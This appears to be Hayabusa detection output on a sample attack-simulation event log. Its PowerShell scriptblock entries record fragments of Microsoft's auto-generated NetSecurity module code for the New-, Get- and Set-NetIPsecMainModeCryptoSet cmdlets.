[Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"s.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"dxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 